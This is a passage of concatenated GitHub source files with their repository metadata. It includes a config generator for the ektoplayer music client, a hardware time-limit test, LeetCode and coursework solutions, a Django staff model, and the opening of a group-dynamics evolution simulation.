print(s)\n# print(s.split(';')[1])\n","repo_name":"phoenixGit228/python","sub_path":"redis_test/redis_test2.py","file_name":"redis_test2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73406891471","text":"#!/usr/bin/python\n\nimport sys, 
os\nos.chdir(os.path.dirname(sys.argv[0]))\n\ndefault = object()\nc_default = object()\nlateinit = object()\n\n# Parameters:\n# - type: The C storage type of the option\n# - set: The function that is called on the input string to retrieve the config type\n# - help: Option description\n# - default: String that is passed to the `set` function\n# - c_default: Default value converted to the C storage type\n# - lateinit: If set to True, $set($default) is called to initialize the value\n\ncolfmt = lambda s: s.replace(\"column(\", \"static_cast(Database::\")\n\n\nINFOLINE_FORMAT_TOP_MONO = '''\"\\\n'<< ' title{bold} ' >>'\"'''\n\nINFOLINE_FORMAT_TOP_MONO_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \"},\n{column(TRACK_TITLE), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\"}}''')\n\nINFOLINE_FORMAT_BOTTOM_MONO = '''\"\\\nartist{bold} ' - ' album{bold} ' (' year{} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_MONO_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", -1, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", -1, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nINFOLINE_FORMAT_TOP_8 = '''\"\\\n'<< '{fg=black} title{fg=yellow,bold} ' >>'{fg=black}\"'''\n\nINFOLINE_FORMAT_TOP_8_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \", COLOR_BLACK},\n{column(TRACK_TITLE), \"\", COLOR_YELLOW, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\", COLOR_BLACK}}''')\n\nINFOLINE_FORMAT_BOTTOM_8 = '''\"\\\nartist{fg=blue,bold} ' - ' album{fg=red,bold} ' (' year{fg=cyan} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_8_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", COLOR_BLUE, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", COLOR_RED, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", COLOR_CYAN, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nINFOLINE_FORMAT_TOP_256 = '''\"\\\n'<< '{fg=236} title{fg=178,bold} ' >>'{fg=236}\"'''\n\nINFOLINE_FORMAT_TOP_256_CVALUE = colfmt('''{\n{column(COLUMN_NONE), \"<< \", 236},\n{column(TRACK_TITLE), \"\", 178, -1, A_BOLD},\n{column(COLUMN_NONE), \" >>\", 236}}''')\n\nINFOLINE_FORMAT_BOTTOM_256 = '''\"\\\nartist{fg=24,bold} ' - ' album{fg=160,bold} ' (' year{fg=37} ')'\"'''\n\nINFOLINE_FORMAT_BOTTOM_256_CVALUE = colfmt('''{\n{column(TRACK_ARTIST), \"\", 24, -1, A_BOLD},\n{column(COLUMN_NONE), \" - \"},\n{column(ALBUM_TITLE), \"\", 160, -1, A_BOLD},\n{column(COLUMN_NONE), \" (\"},\n{column(ALBUM_YEAR), \"\", 37, -1, 0},\n{column(COLUMN_NONE), \")\"}\n}''')\n\n\nPLAYLIST_COLUMNS = '''\"\\\nnumber{fg=magenta size=3} artist{fg=blue size=25%} album{fg=red size=30%} \\\ntitle {fg=yellow size=33%} styles{fg=cyan size=20%} bpm{fg=green size=3 right}\"'''\n\nPLAYLIST_COLUMNS_CVALUE = colfmt('''{\n{column(TRACK_NUMBER), COLOR_MAGENTA, -1, 3},\n{column(TRACK_ARTIST), COLOR_BLUE, -1, 25, true},\n{column(ALBUM_TITLE), COLOR_RED, -1, 30, true},\n{column(TRACK_TITLE), COLOR_YELLOW, -1, 33, true},\n{column(ALBUM_STYLES), COLOR_CYAN, -1, 20, true},\n{column(TRACK_BPM), COLOR_GREEN, -1, 3}}''')\n\nPLAYLIST_COLUMNS_256 = '''\"\\\nnumber{fg=97 size=3} artist{fg=24 size=25%} album{fg=160 size=30%} \\\ntitle {fg=178 size=33%} styles{fg=37 size=20%} bpm{fg=28 size=3 right}\"'''\n\nPLAYLIST_COLUMNS_256_CVALUE = colfmt('''{\n{column(TRACK_NUMBER), 97, -1, 3},\n{column(TRACK_ARTIST), 24, -1, 25, true},\n{column(ALBUM_TITLE), 160, -1, 30, true},\n{column(TRACK_TITLE), 178, -1, 33, true},\n{column(ALBUM_STYLES), 37, -1, 20, true},\n{column(TRACK_BPM), 28, -1, 
3}}''')\n\n\noptions = [\n ('database_file', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/meta.db\"',\n help: 'Database file for storing ektoplazm metadata',\n lateinit: True\n }),\n ('log_file', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/ektoplayer.log\"',\n help: 'File used for logging',\n lateinit: True\n }),\n# ('temp_dir', {\n# type: 'std::string', set: 'Filesystem::expand',\n# default: '\"/tmp/.ektoplazm\"',\n# help: 'Temporary dir for downloading files. See `cache_dir`, `archive_dir` and `download_dir`.\\nDirectory will be created if it does not exist, parent directories will not be created.',\n# }),\n ('cache_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.cache/ektoplayer\"',\n help: 'Directory for storing mp3 files. If empty, the downloaded mp3 files won\\'t be moved to `cache_dir`. Instead they will be kept `temp_dir` and will be deleted on application start and exit.\\nDirectory will be created if it does not exist, parent directories will not be created.',\n lateinit: True\n }),\n# ('use_cache', {\n# type: 'bool', set: 'parse_bool',\n# default: 'true',\n# help: \"Enable/disable local mp3 cache.\\nIf this option is disabled, the downloaded mp3 files won't be moved from `cache_dir`.\\nInstead they will reside in `temp_dir` and will be deleted on application exit.\",\n# }),\n ('album_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/albums\"',\n help: 'Where to unpack downloaded album archives to',\n lateinit: True\n }),\n ('archive_dir', {\n type: 'std::string', set: 'Filesystem::expand',\n default: '\"~/.config/ektoplayer/archives\"',\n help: 'Where to download album archives (zip/rar)',\n lateinit: True\n }),\n ('auto_extract_to_archive_dir', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable automatic extraction of downloaded MP3\\narchives from `download_dir` to `archive_dir`',\n }),\n ('delete_after_extraction', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'In combination `with auto_extract_to_archive_dir`:\\nDelete zip archive after successful extraction',\n }),\n ('playlist_load_newest', {\n type: 'int', set: 'parse_int',\n default: '1000',\n help: 'How many tracks from database should be added to the playlist on application start.',\n }),\n ('prefetch', {\n type: 'float', set: 'parse_float',\n default: '0.50',\n help: 'Specify after how many percent the next track shall be prefetched. Set it to 0 to disable it.',\n }),\n ('small_update_pages', {\n type: 'int', set: 'parse_int',\n default: '3',\n help: 'How many pages should be fetched after start',\n }),\n ('use_colors', {\n type: 'int', set: 'parse_use_colors',\n default: '\"auto\"',\n c_default: '-1',\n help: 'Choose color capabilities. auto|mono|8|256',\n }),\n# ('audio_system', {\n# type: 'std::string', set: 'std::string',\n# default: '\"pulse,alsa,jack,oss\"',\n# help: 'Set output audio system. 
See option `-o` in mpg123(1)',\n# }),\n ('playlist.columns', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS,\n c_default: PLAYLIST_COLUMNS_CVALUE,\n help: 'Columns of playlist',\n }),\n ('playlist.columns_256', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS_256,\n c_default: PLAYLIST_COLUMNS_256_CVALUE,\n help: 'Columns of playlist (256 colors)',\n }),\n ('browser.columns', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS,\n help: 'Columns of browser',\n lateinit: True\n }),\n ('browser.columns_256', {\n type: 'PlaylistColumns', set: 'parse_playlist_columns',\n default: PLAYLIST_COLUMNS_256,\n help: 'Columns of browser (256 colors)',\n lateinit: True\n }),\n ('progressbar.display', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable progressbar',\n }),\n ('progressbar.progress_char', {\n type: 'wchar_t', set: 'parse_char',\n default: \"'~'\",\n help: 'Character used for displaying playing progress',\n }),\n ('progressbar.rest_char', {\n type: 'wchar_t', set: 'parse_char',\n default: \"'~'\",\n help: 'Character used for the rest of the line',\n }),\n ('infoline.display', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/display infoline',\n }),\n ('infoline.format_top_mono', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_MONO,\n c_default: INFOLINE_FORMAT_TOP_MONO_CVALUE,\n help: 'Format of first line in infoline (mono colors)',\n }),\n ('infoline.format_bottom_mono', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_MONO,\n c_default: INFOLINE_FORMAT_BOTTOM_MONO_CVALUE,\n help: 'Format of second line in infoline (mono colors)',\n }),\n ('infoline.format_top_8', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_8,\n c_default: INFOLINE_FORMAT_TOP_8_CVALUE,\n help: 'Format of first line in infoline (8 colors)',\n }),\n ('infoline.format_bottom_8', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_8,\n c_default: INFOLINE_FORMAT_BOTTOM_8_CVALUE,\n help: 'Format of second line in infoline (8 colors)',\n }),\n ('infoline.format_top_256', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_TOP_256,\n c_default: INFOLINE_FORMAT_TOP_256_CVALUE,\n help: 'Format of first line in infoline (256 colors)',\n }),\n ('infoline.format_bottom_256', {\n type: 'InfoLineFormat', set: 'parse_infoline_format',\n default: INFOLINE_FORMAT_BOTTOM_256,\n c_default: INFOLINE_FORMAT_BOTTOM_256_CVALUE,\n help: 'Format of second line in infoline (256 colors)',\n }),\n ('tabbar.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable tabbar visibility',\n }),\n ('infoline.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable infoline visibility',\n }),\n ('progressbar.visible', {\n type: 'bool', set: 'parse_bool',\n default: 'true',\n help: 'Enable/disable progressbar visibility',\n }),\n ('tabs.widgets', {\n type: 'packed::TinyArray', set: 'parse_tabs_widgets',\n default: '\"splash,playlist,browser,info,help\"',\n c_default: '{Views::TabWidgets::SPLASH,Views::TabWidgets::PLAYLIST,Views::TabWidgets::BROWSER,Views::TabWidgets::INFO,Views::TabWidgets::HELP}',\n help: 'Specify widget order of tabbar (left to right)',\n }),\n ('main.widgets', {\n type: 'packed::TinyArray', set: 
'parse_main_widgets',\n    default:   '\"infoline,tabbar,readline,windows,progressbar\"',\n    c_default: '{Views::MainWidgets::INFOLINE,Views::MainWidgets::TABBAR,Views::MainWidgets::READLINE,Views::MainWidgets::WINDOWS,Views::MainWidgets::PROGRESSBAR}',\n    help:      'Specify widgets to show (top to bottom)',\n  }),\n]\n\nNAME = 0\n\n# Configuration file ==========================================================\nwith open('ektoplayer.rc', 'w') as fh:\n    #options.sort(key=lambda o: o[NAME])\n    #options.sort(key=lambda o: len(o[NAME]))\n    #options.sort(key=lambda o: o[1][type])\n    #options.sort(key=lambda o: len(o[1][type]))\n\n    for name, o in options:\n        print('#', o[help].replace('\\n', '\\n# '), file=fh)\n        print('set', name, o[default], file=fh)\n        print(file=fh)\n\n    print(\"# vim: filetype=sh\", file=fh)\n\n# CPP files ===================================================================\nwith open('options.declare.hpp', 'w') as fh:\n    options.sort(key=lambda o: o[NAME])\n    options.sort(key=lambda o: len(o[NAME]))\n    options.sort(key=lambda o: o[1][type])\n    options.sort(key=lambda o: len(o[1][type]))\n    for name, o in options:\n        print('extern', o[type], name.replace('.', '_'), end=';\\n', file=fh)\n\nwith open('options.set.cpp', 'w') as fh:\n    options.sort(key=lambda o: o[NAME])\n    options.sort(key=lambda o: len(o[NAME]))\n    for name, o in options:\n        print('case Hash::djb2(\\\"%s\\\"): %s = %s(value); break;' % (\n            name, name.replace('.', '_'), o[set]\n        ), file=fh)\n\nwith open('options.define.cpp', 'w') as fh:\n    options.sort(key=lambda o: o[NAME])\n    options.sort(key=lambda o: len(o[NAME]))\n    options.sort(key=lambda o: o[1][type])\n    options.sort(key=lambda o: len(o[1][type]))\n\n    pad = max(map(lambda o: len(o[NAME]), options))\n    fmt = '%%-%ds Config :: %%s' % pad\n\n    for name, o in options:\n        print(fmt % (o[type], name.replace('.', '_')), end='', file=fh)\n\n        if o.get(lateinit, False):\n            print(' /* will be initialized later */', end='', file=fh)\n        else:\n            if o.get(c_default, None):\n                print(' =', o[c_default], end='', file=fh);\n            else:\n                print(' =', o[default], end='', file=fh);\n\n        print(';', file=fh)\n\nwith open('options.initialize.cpp', 'w') as fh:\n    options.sort(key=lambda o: o[NAME])\n    options.sort(key=lambda o: len(o[NAME]))\n    options.sort(key=lambda o: o[1][type])\n    options.sort(key=lambda o: len(o[1][type]))\n\n    for name, o in options:\n        if o.get(lateinit, False):\n            print('%s = %s(%s);' % (\n                name.replace('.', '_'), o[set], o[default]\n            ), file=fh)\n","repo_name":"braph/edev","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"21064012310","text":"import logging\nfrom typing import Union, Any\n\nfrom SMPCrossPlatform.src import wait\nfrom SMPCrossPlatform.src.smp_time import int_to_time, time_to_int\n\nfrom src.checks.test_configuration import TestConfiguration\nfrom src.fixtures.test_autocorrect_arifm_month_fixture import options_time_mode\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_time_limits(\n    conf: TestConfiguration\n) -> None:\n    wakeup = conf.wake_up\n    relay_block = conf.relay_block\n    tool = conf.tool\n    relay_block.all_off()\n\n    logger.info('CHECK TIME LIMITS')\n    relay_block.block_on(8)\n    wait.wait(wakeup)\n\n    try:\n        # Power-on, authorization\n        tool.auth()\n        # load the required settings\n        tool.execute(\"--t=20000 -a 5 -a 3\")\n        tool.execute('--t=20000 -a 25')\n        tool.auth()\n\n        tool.execute(options_time_mode)\n        
tool.execute(f\"--t=20000 -a 2\")  # -a 80\")\n        tool.set_time('31.12.2012 20:59:58')\n\n        wait.wait(5000)\n        rass: Any = 0\n        for day in range(1, 10):\n            tool.set_time(\"{:02d}.01.2012 20:59:58\".format(day))\n            t0: Union[str, int] = int(tool.get_value(\"-og 1\"))\n            logger.info(f\"t0 = {t0}\")  # test output\n\n            wait.wait(4000)  # 2000 is too little\n            logger.info(\"Delay 4 sec\")  # test output\n            tool.deauth()\n            # tool.execute(f'-a 42={t0 + 8}')  # 8 seconds, so that at 4 it is ahead of the current time\n            current_time: int = int(tool.get_value(\"-og 1\"))\n            logger.info(f\"t = {current_time}\")  # test output\n\n            current_time = current_time + 10\n            logger.info(f\"go_sync = {current_time}\")  # test output\n            tool.execute(f'-a 42={current_time}')\n            delta: int = int(tool.get_value(\"-ds 44\"))\n            logger.info(f\"delta ={delta}\")  # test output\n\n            rass = rass + delta\n            logger.info(f\"de-sync = {rass}\")  # test output\n\n            status: int = int(tool.get_value(\"-i 23\"))\n            logger.info(f\"status ={status & (1 << 10)}\")  # test output\n            if (status & (1 << 10) == 0 and rass > 50) or (status & (1 << 10) != 0 and rass <= 50):\n                logger.error(\"Invalid status flag with month limit\")\n                logger.warning(f'test {__name__} is Failure')\n            logger.info(f\"step-1-{day}\")\n\n        logger.info(\"step-1\")\n        tool.auth()\n        # load the required settings\n        tool.execute(\"--t=20000 -a 5 -a 3\")\n        tool.execute(options_time_mode)\n        tool.execute('-os 8=[2:0:1:0]')\n        wait.wait(9000)\n\n        tool.auth()\n\n        tool.execute(f\"--t=20000 -a 2 \")  # -a 80\")\n        tool.set_time('31.12.2012 20:59:58')\n\n        wait.wait(9000)\n        sum_rass: int = 0\n        rass = list(range(1, 13))\n        for month in range(1, 13):\n            tool.auth()\n            nt_str: str = int_to_time(time_to_int(\"01.{:02d}.2013 00:00:00\".format(month)) - 1)\n            logger.info(f\"nt_str = {nt_str}\")  # test output\n            wait.wait(9000)\n            tool.set_time(nt_str)\n            t0 = int(tool.get_value(\"-og 1\"))\n            logger.info(f\"t0 = {t0}\")  # test output\n\n            tool.deauth()\n            wait.wait(2000)  # was 1000\n            logger.info(\"Delay 2 sec\")  # test output\n\n            current_time = int(tool.get_value(\"-og 1\"))\n            logger.info(f\"t = {current_time}\")  # test output\n\n            current_time = current_time + 10\n\n            logger.info(f\"go_sync = {current_time}\")  # test output\n            tool.execute(f'-a 42={current_time}')\n            delta = int(tool.get_value(\"-ds 44\"))\n            logger.info(f\"delta ={delta}\")  # test output\n            sum_rass = sum_rass + delta\n            logger.info(f\"sum_rass = {sum_rass}\")  # test output\n            wait.wait(1000)\n\n            rass[month - 1] = delta\n            status = int(tool.get_value(\"-i 23\"))\n            logger.info(f\"status = {status & (1 << 10)}\")  # test output\n            if (status & (1 << 10) == 0 and sum_rass > 50) or (status & (1 << 10) != 0 and sum_rass <= 50):\n                logger.error(\"Invalid status flag with month limit\")\n                logger.warning(f'test {__name__} is Failure')\n            logger.info(f\"step-2-{month}\")\n\n        logger.info(\"step-3\")\n        sum_rass = sum_rass - 10\n\n        for month_second_func in range(1, 13):\n            tool.auth()\n            nt_str = int_to_time(time_to_int(\"01.{:02d}.2013 00:00:00\".format(month_second_func)) + 10)\n            logger.info(f\"nt_str = {nt_str}\")  # test output\n            wait.wait(9000)\n            tool.set_time(nt_str)\n            t0 = (tool.get_value(\"-og 1\"))\n            logger.info(f\"t0 = {t0}\")  # test output\n\n            tool.deauth()\n            wait.wait(2000)  # was 1000\n            logger.info(\"Delay 2 sec\")  # test output\n\n            current_time = tool.get_value(\"-og 1\")\n            tool.execute(f'-a 42={int(current_time) - 10}')\n            sum_rass = sum_rass - 10\n            logger.info(f\"sum_rass = {sum_rass}\")  # test output\n            logger.info(f\"t = {current_time}\")  # test output\n            status = 
int(tool.get_value(\"-i 23\"))\n logger.info(f\"status = {status & (1 << 10)}\") # test output\n\n if (status & (1 << 10) == 0 and sum_rass > 50) or (status & (1 << 10) != 0 and sum_rass <= 50):\n logger.error(\"Invalid status flag with month limit\")\n logger.warning(f'test {__name__} is Failure')\n logger.info(f\"step-3-{month_second_func}\")\n\n logger.info(\"step-3\")\n logger.warning(f'test {__name__} is OK')\n\n except Exception as ex:\n logger.warning(f'test {__name__} is Failure')\n\n logger.error('', ex)\n","repo_name":"ArturManuilenko/1_ph_stand_tests","sub_path":"src/checks/test_time_limits.py","file_name":"test_time_limits.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37651996845","text":"class Solution:\n def minStoneSum(self, piles: List[int], k: int) -> int:\n piles = list(map(lambda x: -1 * x, piles))\n heapify(piles)\n # print(piles)\n for _ in range(k):\n temp = heappop(piles)\n heappush(piles, floor(temp/2))\n # print(piles)\n return -1 * sum(piles)","repo_name":"fikremariamF/A2SV","sub_path":"1962-remove-stones-to-minimize-the-total/1962-remove-stones-to-minimize-the-total.py","file_name":"1962-remove-stones-to-minimize-the-total.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27992319737","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n i = 0\n div = 0\n my_list_3 = []\n while (i < list_length):\n try:\n div = (my_list_1[i] / my_list_2[i])\n except ZeroDivisionError:\n print(\"division by 0\")\n except TypeError:\n print(\"wrong type\")\n except ValueError:\n print(\"wrong type\")\n except IndexError:\n print(\"out of range\")\n finally:\n my_list_3.append(div)\n div = 0\n i += 1\n return(my_list_3)\n","repo_name":"sechchr22/holbertonschool-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"1849979758","text":"from django.db import models\nfrom .utils import upload_image_path\nfrom django.conf import settings\nfrom django.db.models.signals import post_save, pre_save\nfrom django.dispatch import receiver\nfrom middlewares.middlewares import RequestMiddleware\nfrom django.db.models import Q\n\n\nclass StaffQuerySet(models.query.QuerySet):\n def search(self, query):\n lookups = (Q(user__username__icontains=query) |\n Q(user__first_name__icontains=query) |\n Q(user__last_name__icontains=query) |\n Q(role__icontains=query) |\n Q(gender__icontains=query) |\n Q(dob__icontains=query) |\n Q(address__icontains=query) |\n Q(phone__icontains=query) |\n Q(posting__icontains=query) |\n Q(insurance_cover__icontains=query)\n )\n return self.filter(lookups).distinct()\n\n\nclass StaffManager(models.Manager):\n def get_queryset(self):\n return StaffQuerySet(self.model, using=self._db)\n\n def all(self):\n return self.get_queryset()\n\n def search(self, query):\n return self.get_queryset().search(query)\n\n\nclass Staff(models.Model):\n # STAFF_ROLE_CHOICES\n HIGH_LEVEL = 'High Level'\n MID_LEVEL = 'Mid Level'\n LOW_LEVEL = 'Low Level'\n STAFF_ROLE_CHOICES = (\n (HIGH_LEVEL, 'High Level'),\n (MID_LEVEL, 'Mid Level'),\n (LOW_LEVEL, 'Low Level'),\n )\n # GENDER_CHOICES\n MALE = 'Male'\n FEMALE = 'Female'\n OTHERS = 'Others'\n 
GENDER_CHOICES = (\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n (OTHERS, 'Others'),\n )\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, unique=True, on_delete=models.CASCADE, related_name='user_staff', verbose_name='User'\n )\n role = models.CharField(\n max_length=100, choices=STAFF_ROLE_CHOICES, default='Low Level', verbose_name='Role'\n )\n gender = models.CharField(\n choices=GENDER_CHOICES, blank=True, null=True, max_length=10, verbose_name='gender'\n )\n dob = models.DateField(\n verbose_name='DOB', null=True, blank=True\n )\n address = models.CharField(\n max_length=255, verbose_name='Address', null=True, blank=True\n )\n phone = models.CharField(\n max_length=30, verbose_name='Phone', null=True, blank=True\n )\n posting = models.CharField(\n max_length=100, verbose_name='Posting', null=True, blank=True\n )\n insurance_cover = models.IntegerField(\n verbose_name='Insurance Cover', null=True, blank=True\n )\n image = models.ImageField(\n upload_to=upload_image_path, null=True, blank=True, verbose_name='Image'\n )\n created_at = models.DateTimeField(\n auto_now_add=True, verbose_name='Created At'\n )\n updated_at = models.DateTimeField(\n auto_now=True, verbose_name='Updated At'\n )\n\n objects = StaffManager()\n\n def __str__(self):\n return self.user.username\n\n def get_username(self):\n return self.user.username\n\n def get_name(self):\n name = None\n if self.user.first_name or self.user.last_name:\n name = self.user.get_full_name()\n else:\n name = self.user.username\n return name\n\n def get_smallname(self):\n if self.user.first_name or self.user.last_name:\n name = self.user.get_short_name()\n else:\n name = self.user.username\n return name\n\n def get_dynamic_name(self):\n if len(self.get_username()) < 13:\n name = self.get_username()\n else:\n name = self.get_smallname()\n return name\n\n def get_fields(self):\n def get_dynamic_fields(field):\n if field.name == 'x':\n return (field.name, self.x.title)\n else:\n value = \"-\"\n if not field.value_from_object(self) == None and not field.value_from_object(self) == \"\":\n value = field.value_from_object(self)\n return (field.name, value)\n return [get_dynamic_fields(field) for field in self.__class__._meta.fields]\n\n class Meta:\n verbose_name = 'Staff'\n verbose_name_plural = 'Staffs'\n ordering = ['-created_at']\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_or_update_user_staff(sender, instance, created, **kwargs):\n if created:\n try:\n request = RequestMiddleware(get_response=None)\n request = request.thread_local.current_request\n role = request.POST.get(\"role\")\n Staff.objects.create(\n user=instance, role=role,\n )\n except:\n if instance.is_superuser:\n Staff.objects.create(\n user=instance, role=\"High Level\"\n )\n else:\n Staff.objects.create(\n user=instance\n )\n instance.user_staff.save()\n","repo_name":"NumanIbnMazid/theZoo","sub_path":"staff/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27097959381","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n \n stack, path = [], re.split(\"/+\", path.strip(\"/\"))\n\n for p in path:\n if stack and p == \"..\":\n stack.pop()\n if not (p == \".\" or p == \"..\"):\n stack.append(\"/\" + p)\n \n return \"/\" * (stack == []) + 
\"\".join(stack)","repo_name":"ChengTsungPao/LeetCode","sub_path":"0071_Simplify_Path/code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"27938299239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 15 2019\nLast Update March 28 2020\n\nImplements main MLS model of group dynamics with evolution of individual traits\n\n@author: Simon van Vliet & Gil Henriques\nDepartment of Zoology\nUniversity of Britisch Columbia\nvanvliet@zoology.ubc.ca\nhenriques@zoology.ubc.ca\n\n\"\"\"\n\n\"\"\"============================================================================\nImport dependencies & define global constants\n============================================================================\"\"\"\n\nfrom numba.types import Tuple, UniTuple\nfrom numba import jit, f8, i8\nimport math\nimport numpy as np\nfrom mainCode import MlsGroupDynamics_utilities as util\nfrom mainCode import MlsGroupDynamics_main as mls\nimport time\n\n\n\"\"\"============================================================================\nGLOBAL Constants\n============================================================================\"\"\"\n\n#outputMat variables to store\nstateVar = ['NTot', 'NCoop', 'fCoop',\n 'NGroup', 'groupSizeAv', 'groupSizeMed', \n 'offspr_size','offspr_frac']\n\n\nsizeGroupMatInit = 300\nsizeGroupMatIncrement = 100\n\n#setup bins and vectors for group traits\nnBinOffsprSize = 100\nnBinOffsprFrac = 100 \n\nbinsOffsprSize = np.linspace(0, 0.5, nBinOffsprSize+1)\nbinsOffsprFrac = np.linspace(0, 1, nBinOffsprFrac+1)\n\nbinCenterOffsprSize = (binsOffsprSize[1::]+binsOffsprSize[0:-1])/2\nbinCenterOffsprFrac = (binsOffsprFrac[1::]+binsOffsprFrac[0:-1])/2\n\n#init matrix to keep mutations inbounds\noffsprFracMatrix = np.zeros((nBinOffsprFrac, nBinOffsprSize),dtype=int)\nfor ff in range(nBinOffsprFrac):\n for ss in range(nBinOffsprSize):\n offsprFracUp = binsOffsprFrac[1:]\n offsprFracLow = binsOffsprFrac[:-1]\n \n toLow = offsprFracUp[ff] < binsOffsprSize[ss]\n toHigh = offsprFracLow[ff] > (1-binsOffsprSize[ss])\n #decrease or increase offsprFracIdx till within bounds\n if toHigh:\n idx = np.arange(nBinOffsprFrac)\n withinBounds = offsprFracLow < (1 - binsOffsprSize[ss])\n offsprFracIdx = int(np.max(idx[withinBounds]))\n elif toLow:\n idx = np.arange(nBinOffsprFrac)\n withinBounds = offsprFracUp > binsOffsprSize[ss]\n offsprFracIdx = int(np.min(idx[withinBounds]))\n else:\n offsprFracIdx = ff\n offsprFracMatrix[ff, ss] = int(offsprFracIdx)\n \n\n\"\"\"============================================================================\nInit functions \n============================================================================\"\"\"\n\n#enlarges 4D group trait matrix incase there are not enough empty spaces for new groups\n@jit(Tuple((f8[:, :, :, ::1], f8[::1]))(f8[:, :, :, ::1], f8[::1]), nopython=True)\ndef expand_grpMat(grpMat, grpLUT):\n matShape = grpMat.shape\n newGrSize = matShape[1] + sizeGroupMatIncrement\n #create new matrices\n grpMatNew = np.zeros((matShape[0], newGrSize, matShape[2], matShape[3]))\n grpLUTNew = np.full(newGrSize, np.nan)\n #store old values\n grpMatNew[:, 0:matShape[1], :, :] = grpMat\n grpLUTNew[0:matShape[1]] = grpLUT\n return (grpMatNew, grpLUTNew) \n\n# initialize outputMat matrix\ndef init_outputMat_matrix(model_par):\n sampleInt = model_par['sampleInt']\n maxT = model_par['maxT']\n numTSample = int(np.ceil(maxT / sampleInt) + 
1)\n \n addVar = ['time']\n stateVarPlus = stateVar + \\\n ['N%i' % x for x in range(model_par['indv_NType'])] + \\\n ['N%imut' % x for x in range(model_par['indv_NType'])]\n\n # init outputMat matrix\n dTypeList1 = [(x, 'f8') for x in stateVarPlus]\n dTypeList2 = [(x+'_mav', 'f8') for x in stateVarPlus]\n dTypeList3 = [(x, 'f8') for x in addVar]\n dTypeList = dTypeList1 + dTypeList2 + dTypeList3\n dType = np.dtype(dTypeList)\n\n # initialize outputMats to NaN\n outputMat = np.full(numTSample, np.nan, dType)\n outputMat['time'][0] = 0\n\n # init matrix to track distribution replication strategies \n traitDistr = np.full((numTSample, nBinOffsprFrac, nBinOffsprSize), np.nan)\n\n return (outputMat, traitDistr)\n\n\n# initialize group matrix\n# each column is a group and lists number of [A,A',B,B'] cells\ndef init_grpMat(model_par):\n # grpMat is 4D matrix of:\n # [cell type / group id / fraction cells to offspring / fractional size of offspring]\n # grpMat2D is 2D matrix of:\n # [cell type / group id]\n # grpLUT maps location of group i within 4D grpMat to location of group i in 2D grpMat2D\n # grpLUT[i] is column index of group i within grpMat2D\n # np.nan indicates unassigned groups\n # to go from group j (column index) in grpMat2D to index i in 4D grpMat use:\n # i = np.nonzero(grpLUT==j)\n \n #get properties\n NGroup = 